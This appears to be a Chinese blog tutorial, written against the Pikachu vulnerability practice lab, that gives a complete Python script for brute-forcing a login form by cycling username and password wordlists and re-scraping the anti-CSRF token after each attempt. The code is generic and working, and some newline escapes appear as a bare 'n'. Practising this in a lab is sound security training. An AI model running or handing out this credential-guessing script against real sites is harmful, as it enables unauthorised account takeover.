栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

Python暴力破解网站登录密码(带token验证)

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Python暴力破解网站登录密码(带token验证)

目录:

关键代码解释

设置请求头get_token函数获取token值 完整代码:运行结果:

上一篇暴力破解文章:一个简单的Python暴力破解网站登录密码脚本

测试靶机为Pikachu漏洞练习平台暴力破解模块下的 “token防爆破?”

春节期间歇了一阵子,吃睡玩看小说。写这个脚本的起因是因为burp设置带token的暴力破解我只会用pitchfork草叉模式,要是用cluster bomb集束炸弹模式笛卡儿积那样就不会了,所以就干脆把之前写的脚本加了点东西实现这个功能了,到时候有空再学学多线程,爆破速度就更快了。

关键代码解释 设置请求头

5~11行:指定url地址和请求头,user_token设置首次发送请求包时的token值。

url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"
user_token = '8680761fe979039a6f836599906'
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
    'cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'
}
get_token函数获取token值

13~16行:这个函数返回从响应包中获取的token

在http响应包中有一个隐藏的标签里面有token值:


第15行:soup.select查找标签名为input,name为token的元素的value的值。

def get_token(r):
    soup = BeautifulSoup(r.text, 'html.parser')
    user_token = soup.select('input[name="token"]')[0]['value']
    return user_token
完整代码:
from bs4 import BeautifulSoup
import requests
from requests.models import Response

url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"
user_token = '8680761fe979039a6f836599906'
#proxies = {"http": "http://127.0.0.1:8080"}  # 代理设置,方便burp抓包查看和调试
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
    'cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'
}

def get_token(r):
    soup = BeautifulSoup(r.text, 'html.parser')
    user_token = soup.select('input[name="token"]')[0]['value']
    return user_token

if __name__ == "__main__":
    f = open('result.csv', 'w')     #把爆破结果储存到文件里,这里为csv格式
    f.write('用户名' + ',' + '密码' + ',' + '包长度' + 'n')    #给文件设置标题

    #遍历字典文件,Cluster bomb 暴力破解
    for admin in open("C:\Users\admin\documents\字典\账号.txt"):
        for line in open("C:\Users\admin\documents\字典\密码.txt"):
            username = admin.strip()
            password = line.strip()
            payload = {     #payload为POST的数据
                'username': username,
                'password': password,
                'token': user_token,
                'submit': 'Login'
            }

            Response = requests.post(url, data=payload, headers=header)
            result = username + ',' + password + ',' + str(len(Response.text))  #用户名密码以及响应包长度

            print(result)           #输出到终端
            f.write(result + 'n')  #输出到文件
            user_token = get_token(Response)    #调用get_token函数获取下一次循环需要的token
    print('n---完成---n')
    f.close()
运行结果:

查看保存的文件,查看包长度与其他不一样的数据

这里csv不会显示前缀会自动去掉首位0,可以把文件改成txt格式就正常显示了


尝试登陆一下,登录成功。

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/738291.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号